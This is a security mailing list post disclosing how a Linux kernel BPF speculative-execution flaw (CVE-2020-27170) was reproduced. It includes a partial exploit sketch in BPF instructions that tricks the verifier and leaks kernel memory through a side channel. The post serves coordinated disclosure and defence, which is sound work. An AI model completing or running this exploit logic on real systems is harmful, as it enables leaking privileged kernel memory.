[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linu
From: Piotr Krysiuk <piotras () gmail ! com>
Date: 2021-03-24 19:34:50
Message-ID: CAFzhf4rREUjn4=Z45GBxvo4CAvf5=xPEiu3O0rpnWF3hR-7AxQ () mail ! gmail ! com
[Download RAW message or body]
Some details of how CVE-2020-27170 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.
As the embargo expires today, I was asked to share these details
publically on oss-security.
The CVE-2020-27170 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for BPF
program attached to a socket:
load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX,
load pointer to our big array into BPF_REG_MAP_PTR,
load offset of data to leak into BPF_REG_OFFSET,
// load any slowly-loaded value...
BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),
// ... and turn it into known zero for verifier,
// while preserving slowly-loaded dependency for affected hardware
BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),
// speculatively bypassed offset check
BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
skip_speculation),
// speculatively unbounded pointer arithmetic
BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET),
// speculatively unbounded load
BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX,
offsetof(struct __sk_buff, protocol)),
transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel,
The full reproducers were shared with a number of Linux distributions
for protection purposes.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic